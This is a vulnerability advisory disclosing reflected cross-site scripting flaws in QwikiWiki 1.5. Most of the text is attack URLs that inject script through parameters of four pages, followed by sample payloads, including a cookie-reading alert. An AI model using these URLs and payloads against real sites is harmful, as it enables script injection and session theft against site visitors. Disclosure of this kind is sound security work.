QwikiWiki 1.5 <== Multiple Script Insertion Vulnerability

===================================

Information of Software:

Software: QwikiWiki 1.5
Site: http://qwikiwiki.com
Description: QwikiWiki is a very simple wiki CMS. It's have most XSS 
vulnerability. Is not difficult use it

===================================

Bug:

1) index.php Multiple Script Insertion Vulnerability

QwikiWiki contains a flaw that allows a remote cross site scripting attack. 
In the index.php an user can insert an XSS code into the variable Home&from= ,
Home&help and Home&from=Home&help

Example:

http://[target]/index.php?page=Home&from=[XSS]
http://[target]/index.php?page=Home&help=[XSS]
http://[target]/index.php?page=Home&from=Home&help=[XSS]

---------------------------------------------------

2) login.php Multiple Script Insertion Vulnerability

Example:

http://[target]/login.php?page=Home&action=Login&action=[XSS]&debug=1&help=true&username=1&password=1
http://[target]/login.php?page=[XSS]&action=Login&action=Login&debug=1&help=true&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=[XSS]&help=true&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=[XSS]&username=1&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=[XSS]&password=1
http://[target]/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=1&password=[XSS]

---------------------------------------------------

3) pageindex.php Script Insertion Vulnerability

Example:

http://[target]/pageindex.php?nothing=nothing&help=[XSS]

---------------------------------------------------

4) recentchanges.php Script Insertion Vulnerability

Example:

http://[target]/recentchanges.php?nothing=nothing&help=[XSS]

---------------------------------------------------

You can changes the value [XSS] with:

"><body bgcolor="black"></body>
"><alert(document.cookie);</script>
"><script>alert("lol");</script>

and every javascript or HTML code

===================================

Credit:

Author:  Kiki
e-mail: federico.sana@alice.it
web page: http://kiki91.altervista.org and http://blackzero.netsons.org

===================================